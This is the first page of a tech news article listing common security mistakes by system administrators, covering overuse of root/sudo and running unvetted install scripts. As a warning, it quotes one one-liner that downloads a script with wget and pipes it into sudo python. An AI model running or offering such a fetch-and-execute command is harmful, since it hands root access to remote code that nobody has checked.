10 dumb security mistakes sys admins make

Fahmida Y. Rashid

10 dumb security mistakes sys admins make

Security isn’t merely a technical problem -- it's a people problem. There’s only so much technology you can throw at a network before dumb human mistakes trip you up.

But guess what? Those mistakes are often committed by the very people who should know better: system administrators and other IT staff.

Intermedia's 2015 Insider Risk Report found that IT professionals were the most likely group to engage in “dangerous” security practices, such as sharing passwords/logins, reusing personal passwords for business applications, or giving personal account credentials to others. 

Such lapses tend to be far riskier than those of ordinary users, due to the godlike powers sys admins have over the network. IT pros can be as susceptible as users to phishing, malware, and other attacks -- and stolen, privileged sys admin credentials almost always result in far more serious security breaches.

Here are 10 common security blunders made by sys admins and other IT staff:

Blunder No. 1: Using sudo for everything

When you log in as root, you have full control over the box. This can be extremely dangerous because if your credentials get stolen, an attacker can do whatever he or she wants.

In Windows parlance, there’s no need to log in as Administrator if there are no administrator-level tasks to perform. Instead of directly logging into systems as root, log in through your personal account and use sudo for specific commands as needed.

It's easy to backslide if you're not careful. A script fails because one of the commands needed sudo -- and now everything must be restarted. If you fail to keep track of which commands require elevated privileges and which don’t, you may go back to running everything as sudo.

Blunder 2: Running scripts of unknown origin

Installing third-party Linux applications is another area where sudo can be abused. All you have to do is copy and paste the command -- which is already set up to use sudo -- directly into the terminal to kick off the install script. Every single command in that script will be executed with elevated privileges.

Here's an example, copied right off the Web (with the URL hidden):

sudo -v && wget -nv -O- https://xxx/xxx/linux-installer.py | sudo python -c "import sys; main=lambda:sys.stderr.write('Download failed\n'); exec(sys.stdin.read()); main()"

This gives sudo privileges to an item hosted elsewhere on the Web, as well as running Python locally. Not recommended! Windows admins face similar potential catastrophes running downloaded PowerShell scripts.

Even if you trust the source, never assume a script downloaded from the Internet is safe. Always vet the contents of the script first and verify that executing the commands will not result in nefarious actions.

1  2  3  4  5  Next Page